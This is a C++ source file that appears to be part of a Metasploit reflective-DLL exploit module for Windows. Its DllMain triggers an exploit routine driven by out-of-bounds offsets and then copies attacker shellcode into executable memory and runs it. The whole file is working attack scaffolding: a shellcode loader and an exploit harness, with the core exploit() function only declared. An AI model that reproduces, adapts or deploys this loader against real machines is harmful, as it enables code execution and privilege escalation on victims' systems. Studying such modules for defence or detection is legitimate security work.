70 lines
1.6 KiB
C++
70 lines
1.6 KiB
C++
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
|
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
|
#include "ReflectiveLoader.c"
|
|
|
|
#include <stdio.h>
|
|
#include <windows.h>
|
|
|
|
int exploit(unsigned int xleft_offset, unsigned int oob_offset);
|
|
|
|
typedef struct _MSF_PAYLOAD {
|
|
DWORD dwxLeftOffset;
|
|
DWORD dwOOBOffset;
|
|
DWORD dwSize;
|
|
CHAR cPayloadData[0x1000];
|
|
} MSF_PAYLOAD;
|
|
typedef MSF_PAYLOAD* PMSF_PAYLOAD;
|
|
|
|
int executepayload(void * payload, size_t size)
|
|
{
|
|
LPVOID shellcode = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
|
|
if (!shellcode) {
|
|
return -1;
|
|
}
|
|
memcpy(shellcode, payload, size);
|
|
((void(*)()) shellcode)();
|
|
return 0;
|
|
}
|
|
|
|
int runpayload(PMSF_PAYLOAD pMsfPayload)
|
|
{
|
|
if (!pMsfPayload) {
|
|
return -1;
|
|
}
|
|
return executepayload(&pMsfPayload->cPayloadData, pMsfPayload->dwSize);
|
|
}
|
|
|
|
void beginexploit(LPVOID lpReserved)
|
|
{
|
|
PMSF_PAYLOAD payload = (PMSF_PAYLOAD)lpReserved;
|
|
if (!exploit(payload->dwxLeftOffset, payload->dwOOBOffset))
|
|
{
|
|
runpayload(payload);
|
|
}
|
|
}
|
|
|
|
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
|
|
{
|
|
switch (dwReason)
|
|
{
|
|
case DLL_METASPLOIT_ATTACH:
|
|
break;
|
|
case DLL_QUERY_HMODULE:
|
|
hAppInstance = hinstDLL;
|
|
if (lpReserved != NULL)
|
|
{
|
|
*(HMODULE*)lpReserved = hAppInstance;
|
|
}
|
|
break;
|
|
case DLL_PROCESS_ATTACH:
|
|
hAppInstance = hinstDLL;
|
|
beginexploit(lpReserved);
|
|
break;
|
|
case DLL_PROCESS_DETACH:
|
|
case DLL_THREAD_ATTACH:
|
|
case DLL_THREAD_DETACH:
|
|
break;
|
|
}
|
|
return TRUE;
|
|
}
|